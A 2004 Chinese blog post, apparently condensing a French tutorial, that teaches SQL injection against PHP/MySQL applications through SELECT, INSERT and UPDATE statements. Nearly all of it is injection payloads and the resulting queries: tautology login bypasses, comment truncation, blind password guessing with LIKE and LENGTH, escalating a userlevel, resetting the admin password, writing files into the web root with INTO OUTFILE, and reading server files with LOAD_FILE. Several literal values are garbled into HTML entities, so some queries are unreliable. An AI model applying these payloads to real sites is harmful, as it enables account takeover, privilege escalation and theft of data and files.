新一篇: 多种PHP程序存在\0过滤不严漏洞  | 旧一篇: PHP网站漏洞的相关总结

PHP注入.精简版本.小夜整理.有些地方我加了注释.
文章比较细致.主要介绍了三种SQL句子的注入方法.

1- SELECT
2- INSERT
3- UPDATE

$req = "SELECT * FROM membres WHERE name LIKE '%$search%' ORDER BY name"


où $search est la variable modifiable par l'utilisateur, venant d'un formulaire post (ou autre chose) de ce type :


<form method="POST" action="<? echo $PHP_SELF; ?>">
<input type="text" name="search"><br>
<input type="submit" value="Search">
</form>

SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY name

$req = "SELECT uid FROM admins WHERE login='$login' AND password='$pass'"

SELECT * FROM table WHERE 1=1
SELECT * FROM table WHERE 'uuu'='uuu'
SELECT * FROM table WHERE 1<>2
SELECT * FROM table WHERE 3>2
SELECT * FROM table WHERE 2<3
SELECT * FROM table WHERE 1
SELECT * FROM table WHERE 1+1
SELECT * FROM table WHERE 1--1
SELECT * FROM table WHERE ISNULL(NULL)
SELECT * FROM table WHERE ISNULL(COT(0))
SELECT * FROM table WHERE 1 IS NOT NULL
SELECT * FROM table WHERE NULL IS NULL
SELECT * FROM table WHERE 2 BETWEEN 1 AND 3
SELECT * FROM table WHERE 'b' BETWEEN 'a' AND 'c'
SELECT * FROM table WHERE 2 IN (0,1,2)
SELECT * FROM table WHERE CASE WHEN 1>0 THEN 1 END -------小猪早就开始利用了.呵呵.


SELECT uid FROM admins WHERE login='' OR 'a'='a' AND password='' OR 'a'='a'

SELECT uid FROM admins WHERE login='John' AND password='' OR 'b' BETWEEN 'a' AND 'c'

SELECT * FROM table WHERE nom='Jack'# commentaire

SELECT * FROM table WHERE nom='Jack'


SELECT * FROM table WHERE /* commentaires */ addresse=&#3925; rue des roubys'

SELECT * FROM table WHERE addresse=&#3925; rue des roubys'

SELECT uid FROM admins WHERE login='John'#' AND password=''

SELECT uid FROM admins WHERE login='' OR admin_level=1#' AND password=''

$req = "SELECT password FROM admins WHERE login='$login'"

SELECT * FROM table INTO OUTFILE '/complete/path/to/file.txt' ----将表导出.


SELECT password FROM admins WHERE login='John' INTO DUMPFILE '/path/to/site/file.txt'

http://[target]/file.txt.
frog' INTO OUTFILE '/path/to/site/file.php .

$req = "SELECT uid FROM membres WHERE login='$login' AND password='$pass'"

SELECT * FROM table WHERE msg LIKE '%hop'

SELECT * FROM table WHERE msg LIKE 'hop%'

SELECT * FROM table WHERE msg LIKE '%hop%'

SELECT * FROM table WHERE msg LIKE 'h%p'

SELECT * FROM table WHERE msg LIKE 'h_p'


SELECT uid FROM membres WHERE login='Bob' AND password LIKE 'a%'#' AND password=''


SELECT uid FROM membres WHERE login='Bob' AND LENGTH(password)=6#' AND password=''


$req = "SELECT email, website FROM membres WHERE name LIKE '%$search%' ORDER BY name"


SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY name


$req = "SELECT email, website FROM membres WHERE name LIKE '%$search%' ORDER BY $orderby"

以上是SELECT的注入.上面提到的.我们早已经掌握了.继续看

INSERT :

CREATE TABLE membres (
id int(10) NOT NULL auto_increment,
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)


$query1 = "INSERT INTO membres (login,password,nom,email,userlevel) VALUES ('$login','$pass','$nom','$email',&#391;')"


INSERT INTO membres (login,password,nom,email,userlevel) VALUES ('','','','',&#393;')#',&#391;')


CREATE TABLE membres (
id int(10) NOT NULL auto_increment,
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint default &#391;',
PRIMARY KEY (id)
)

$query2 = "INSERT INTO membres SET login='$login',password='$pass',nom='$nom',email='$email'"


INSERT INTO membres SET login='',password='',nom='',userlevel=&#393;',email=''


CREATE TABLE membres (
id varchar(15) NOT NULL default '',
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)


$query3 = "INSERT INTO membres VALUES ('$id','$login','$pass','$nom','$email',&#391;')"


INSERT INTO membres VALUES ('[ID]','[LOGIN]','[PASS]','[NOM]','a@a.a',&#393;')#',&#391;')


可见.INSERT注入关键是截断,)再加注释的利用.没问题.很简单吧.继续

UPDATE的利用


CREATE TABLE membres (
id int(10) NOT NULL auto_increment,
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)


$sql = "UPDATE membres SET password='$pass',nom='$nom',email='$email' WHERE id='$id'"


UPDATE membres SET password='[PASS]',nom='',userlevel=&#393;',email=' ' WHERE id='[ID]'


UPDATE membres SET password='[nouveaupass]' WHERE nom='Admin'#',nom='[NOM]',email=' ' WHERE id='[ID]'


UPDATE membres SET password='[nouveaupass]' WHERE nom='Admin'


UPDATE membres SET password='[PASS]',nom='[NOM]',email=' ' WHERE id='' OR name='Admin'


CREATE TABLE news (
idnews int(10) NOT NULL auto_increment,
title varchar(50),
author varchar(20),
news text,
Votes int(5),
score int(15),
PRIMARY KEY (idnews)
)


$sql = "UPDATE news SET Votes=Votes+1, score=score+$note WHERE idnews='$id'"

UPDATE news SET Votes=Votes+1, score=score+3, title='hop' WHERE idnews=&#3912;'

UPDATE news SET Votes=Votes+1, score=score+3,Votes=0 WHERE idnews=&#3912;'

UPDATE news SET Votes=Votes+1, score=score+3, title=char(104,111,112) WHERE idnews=&#3912;'

la fonction ASCII() ou ORD(). ASCII('h') et ORD('h')


UPDATE news SET Votes=Votes+1, score=score+3, title=0x616263 WHERE idnews=&#3912;'
SELECT CONV("abc",16,3), CONV("abc",16,8).


DATABASE() et USER() ( ou SYSTEM_USER() ou CURRENT_USER() ou SESSION_USER() )

UPDATE news SET Votes=Votes+1, score=score+3, title=DATABASE() WHERE idnews=&#3912;'

UPDATE news SET Votes=Votes+1, score=score+3, news=LOAD_FILE('/tmp/picture') WHERE idnews=&#3912;'

发表于 @ 2004年10月29日 19:52:00|评论(loading...)|编辑

新一篇: 多种PHP程序存在\0过滤不严漏洞  | 旧一篇: PHP网站漏洞的相关总结